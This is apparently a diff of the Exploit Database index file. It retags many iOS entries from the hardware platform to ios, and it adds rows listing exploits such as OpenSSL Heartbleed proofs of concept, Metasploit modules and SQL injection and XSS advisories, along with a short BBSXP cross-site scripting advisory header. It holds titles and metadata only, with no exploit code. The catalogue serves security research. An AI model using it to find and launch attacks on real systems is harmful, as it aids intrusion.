31258,platforms/hardware/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,hardware,webapps,0
31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0
31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow Exploit (SEH)",2014-01-29,"Dario Estrada",windows,remote,53
31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443
31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80
@ -28375,7 +28377,7 @@ id,file,description,date,author,platform,type,port
31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF Vulnerability",2014-02-11,killall-9,hardware,webapps,80
31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80
31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80
31573,platforms/hardware/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,hardware,webapps,8880
31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880
31574,platforms/arm/local/31574.c,"Linux ARM - Local Root Exploit",2014-02-11,"Piotr Szerman",arm,local,0
31575,platforms/windows/remote/31575.rb,"KingScada kxClientDownload.ocx ActiveX - Remote Code Execution",2014-02-11,metasploit,windows,remote,0
31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0
@ -28418,7 +28420,7 @@ id,file,description,date,author,platform,type,port
31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial-of-Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0
31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Include Vulnerability",2008-04-04,ZoRLu,php,webapps,0
31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0
31618,platforms/hardware/webapps/31618.txt,"jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,hardware,webapps,0
31618,platforms/ios/webapps/31618.txt,"jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps,0
31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Parameter Denial of Service Vulnerability",2008-04-21,"Rodrigo Carvalho",osx,dos,0
31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Parameter Denial Of Service Vulnerability",2008-04-21,"Core Security Technologies",osx,dos,0
31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting Vulnerability",2008-04-07,syniack,java,webapps,0
@ -28486,9 +28488,9 @@ id,file,description,date,author,platform,type,port
31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0
31689,platforms/windows/remote/31689.py,"HP Data Protector EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
31690,platforms/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability",2014-02-16,"Dhruv Shah",hardware,webapps,80
31691,platforms/hardware/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include Vulnerability",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31692,platforms/hardware/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31693,platforms/hardware/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31691,platforms/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include Vulnerability",2014-02-16,Vulnerability-Lab,ios,webapps,8080
31692,platforms/ios/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080
31693,platforms/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080
31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID - Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0
31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection",2014-02-16,metasploit,php,remote,0
31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service Vulnerability",2008-04-22,"Luigi Auriemma",windows,dos,0
@ -28528,7 +28530,7 @@ id,file,description,date,author,platform,type,port
31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL php/prenom.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche - Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
31733,platforms/hardware/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,hardware,webapps,50496
31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496
31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80
31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php, cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80
31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
@ -28544,6 +28546,7 @@ id,file,description,date,author,platform,type,port
31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0
31747,platforms/php/webapps/31747.pl,"iGaming CMS 1.5 - 'poll_vote.php' SQL Injection Vulnerability",2008-05-05,Cod3rZ,php,webapps,0
31748,platforms/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption Vulnerability",2008-05-06,Sowhat,windows,dos,0
31749,platforms/php/webapps/31749.py,"RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injection Vulnerabilities",2008-05-06,The:Paradox,php,webapps,0
31750,platforms/php/webapps/31750.txt,"QTO File Manager 1.0 - 'qtofm.php' Arbitrary File Upload Vulnerability",2008-05-06,"CrAzY CrAcKeR",php,webapps,0
31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Parameter Cross-Site Scripting Vulnerability",2008-05-06,"Christian Holler",php,webapps,0
31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Include Vulnerabilities",2008-05-07,Matrix86,php,webapps,0
@ -28689,10 +28692,10 @@ id,file,description,date,author,platform,type,port
31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP - Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0
31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80
31895,platforms/windows/local/31895.txt,"Notepad++ CCompletion Plugin 1.19 - Stack Buffer Overflow",2014-02-25,tishion,windows,local,0
31896,platforms/hardware/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,hardware,webapps,8080
31896,platforms/ios/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,ios,webapps,8080
31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection Vulnerability",2014-02-25,Hurley,php,webapps,80
31899,platforms/windows/dos/31899.txt,"VLC 2.1.3 - (.avs file) Crash PoC",2014-02-25,kw4,windows,dos,0
31900,platforms/hardware/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,hardware,webapps,0
31900,platforms/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps,0
31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 - 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0
31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0
31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-By-One Buffer Overflow Vulnerability",2008-06-21,"Philipp Thomas",linux,remote,0
@ -28704,6 +28707,7 @@ id,file,description,date,author,platform,type,port
31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0
31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0
31911,platforms/linux/local/31911.txt,"Vim 7.x - Vim Script Multiple Command Execution Vulnerabilities",2008-06-14,"Jan Minar",linux,local,0
31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation Vulnerability",2008-06-14,"Michael Gray",multiple,remote,0
31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0
31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80
@ -28753,7 +28757,7 @@ id,file,description,date,author,platform,type,port
31959,platforms/linux/local/31959.txt,"Perl 'rmtree()' Function Local Insecure Permissions Vulnerability",2008-06-23,"Frans Pop",linux,local,0
31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80
31962,platforms/hardware/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,hardware,webapps,8080
31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080
31963,platforms/php/webapps/31963.txt,"E-topbiz Link ADS 1 'out.php' SQL Injection Vulnerability",2008-06-24,"Hussin X",php,webapps,0
31964,platforms/windows/dos/31964.txt,"5th street 'dx8render.dll' Format String Vulnerability",2008-06-25,superkhung,windows,dos,0
31965,platforms/linux/dos/31965.c,"Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0
@ -29107,7 +29111,7 @@ id,file,description,date,author,platform,type,port
32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0
32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability",2014-03-17,"Ibrahim Raafat",php,webapps,0
32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack-based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80
32333,platforms/hardware/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",hardware,dos,0
32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0
32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 'account.php' Cross-Site Scripting Vulnerability",2008-09-03,Xc0re,php,webapps,0
32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 Malformed 'view-source' HTTP Header Remote Denial of Service Vulnerability",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0
32336,platforms/hardware/remote/32336.txt,"D-Link DIR-100 1.12 Security Bypass Vulnerability",2008-09-08,"Marc Ruef",hardware,remote,0
@ -29146,7 +29150,7 @@ id,file,description,date,author,platform,type,port
32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0
32371,platforms/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote,0
32372,platforms/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,unix,remote,22
32374,platforms/hardware/remote/32374.txt,"Wireless Drive v1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,hardware,remote,0
32374,platforms/ios/webapps/32374.txt,"Wireless Drive v1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,ios,webapps,0
32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 + < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0
32381,platforms/multiple/dos/32381.js,"Avant Browser 11.7 Build 9 - JavaScript Engine Integer Overflow Vulnerability",2008-09-12,0x90,multiple,dos,0
32382,platforms/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay Vulnerability",2008-09-15,"Eric Beaulieu",multiple,remote,0
@ -29319,10 +29323,10 @@ id,file,description,date,author,platform,type,port
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619
32557,platforms/hardware/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32558,platforms/hardware/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32559,platforms/hardware/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32560,platforms/hardware/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32557,platforms/ios/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability",2014-03-27,Vulnerability-Lab,ios,webapps,8080
32558,platforms/ios/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080
32559,platforms/ios/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080
32560,platforms/ios/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080
32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80
32562,platforms/php/webapps/32562.txt,"Joomla Kunena Component 3.0.4 - Persistent XSS",2014-03-27,Qoppa,php,webapps,80
32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro 'id' Parameter SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0
@ -29331,7 +29335,7 @@ id,file,description,date,author,platform,type,port
32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 Cross Site Scripting Vulnerability",2008-11-04,"Brad Antoniewicz",php,webapps,0
32567,platforms/php/webapps/32567.txt,"DHCart 3.84 Multiple Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0
32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki Remote Command Execution Vulnerability",2014-03-28,"SecPod Research",windows,remote,80
32569,platforms/hardware/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,hardware,webapps,8888
32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888
32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Include Vulnerability",2008-11-06,DeltahackingTEAM,php,webapps,0
32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 SQL Injection and Cross Site Scripting Vulnerabilities",2008-11-07,G4N0K,php,webapps,0
32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - Atepmon.sys IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0
@ -29380,8 +29384,8 @@ id,file,description,date,author,platform,type,port
32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script admin/adminhome.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script admin/index.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - XSS Remote Shell Exploit & Credentials Leak",2014-03-31,neglomaniac,php,remote,0
32619,platforms/hardware/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,hardware,webapps,52789
32620,platforms/hardware/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,hardware,webapps,8080
32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789
32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080
32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80
32622,platforms/php/webapps/32622.txt,"Wordpress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80
32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read",2014-03-31,"Brandon Perry",multiple,webapps,0
@ -29424,7 +29428,7 @@ id,file,description,date,author,platform,type,port
32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0
32663,platforms/php/webapps/32663.txt,"Injader 2.1.1 SQL Injection and HTML Injection Vulnerabilities",2008-12-15,anonymous,php,webapps,0
32664,platforms/hardware/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,hardware,webapps,8080
32664,platforms/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,ios,webapps,8080
32665,platforms/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
32666,platforms/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
32667,platforms/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",hardware,webapps,80
@ -29463,8 +29467,11 @@ id,file,description,date,author,platform,type,port
32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80
32703,platforms/hardware/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,hardware,webapps,0
32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0
32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0
32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0
32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0
32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0
32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
@ -29476,7 +29483,7 @@ id,file,description,date,author,platform,type,port
32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities (XSS & CSRF)",2014-04-07,"Mayank Kapoor",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,"Mayank Kapoor",php,webapps,0
32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0
32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 'login.php' SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0
32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector Directory Traversal",2014-04-07,metasploit,windows,remote,8080
@ -29491,3 +29498,32 @@ id,file,description,date,author,platform,type,port
32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 User Enumeration Weakness and Cross Site Scripting Vulnerability",2009-01-16,"clément Oudot",cgi,webapps,0
32735,platforms/asp/webapps/32735.txt,"Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0
32736,platforms/asp/webapps/32736.txt,"Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS",2009-01-16,Pouya_Server,asp,webapps,0
32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0
32738,platforms/ios/remote/32738.txt,"Bluetooth Text Chat 1.0 iOS - Code Execution Vulnerability",2014-04-08,Vulnerability-Lab,ios,remote,0
32740,platforms/linux/dos/32740.txt,"QNX RTOS 6.4 - Malformed ELF Binary File Local Denial Of Service Vulnerability",2009-01-19,kokanin,linux,dos,0
32741,platforms/jsp/webapps/32741.txt,"Apache Jackrabbit 1.4/1.5 Content Repository (JCR) search.jsp q Parameter XSS",2009-01-20,"Red Hat",jsp,webapps,0
32742,platforms/jsp/webapps/32742.txt,"Apache Jackrabbit 1.4/1.5 Content Repository (JCR) swr.jsp q Parameter XSS",2009-01-20,"Red Hat",jsp,webapps,0
32743,platforms/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Security Vulnerabilities",2014-04-08,"Juan Manuel Garcia",hardware,remote,0
32745,platforms/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443
32746,platforms/cgi/webapps/32746.txt,"MoinMoin <= 1.8 'AttachFile.py' Cross-Site Scripting Vulnerability",2009-01-20,SecureState,cgi,webapps,0
32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module 'url' Parameter SQL Injection Vulnerability",2009-01-23,"Sina Yazdanmehr",php,webapps,0
32748,platforms/asp/webapps/32748.txt,"BBSXP 5.13 'error.asp' Cross Site Scripting Vulnerability",2009-01-23,arashps0,asp,webapps,0
32749,platforms/linux/dos/32749.txt,"Pidgin <= 2.4.2 'msn_slplink_process_msg()' Denial of Service Vulnerability",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0
32750,platforms/asp/webapps/32750.txt,"OBLOG 'err.asp' Cross Site Scripting Vulnerability",2009-01-23,arash.setayeshi,asp,webapps,0
32751,platforms/linux/local/32751.c,"Systrace 1.x 64-Bit Aware Linux Kernel Privilege Escalation Vulnerability",2009-01-23,"Chris Evans",linux,local,0
32752,platforms/windows/local/32752.rb,"WinRAR Filename Spoofing",2014-04-08,metasploit,windows,local,0
32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm Unauthenticated Command Injection",2014-04-08,metasploit,hardware,remote,0
32754,platforms/osx/dos/32754.c,"MacOS X 10.9 Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0
32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0
32756,platforms/asp/webapps/32756.txt,"LDF 'login.asp' SQL Injection Vulnerability",2009-01-26,"Arash Setayeshi",asp,webapps,0
32757,platforms/php/webapps/32757.txt,"ConPresso CMS Multiple 4.07 Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0
32758,platforms/asp/webapps/32758.txt,"Lootan 'login.asp' SQL Injection Vulnerability",2009-01-26,"Arash Setayeshi",asp,webapps,0
32759,platforms/php/webapps/32759.txt,"OpenX <= 2.6.2 'MAX_type' Parameter Local File Include Vulnerability",2009-01-26,"Sarid Harper",php,webapps,0
32760,platforms/php/webapps/32760.txt,"NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability",2009-01-24,FarhadKey,php,webapps,0
32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 Malformed URI Remote Denial Of Service Vulnerability",2009-01-27,Lostmon,windows,dos,0
32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager <= 7.1 Username Enumeration Weakness",2009-01-27,"Marco Mella",multiple,remote,0
32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service Vulnerability",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0
32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443
32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0
32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection Vulnerability",2009-01-28,buzzy,php,webapps,0
32767,platforms/php/webapps/32767.txt,"QuickCms 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33411/info
BBSXP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
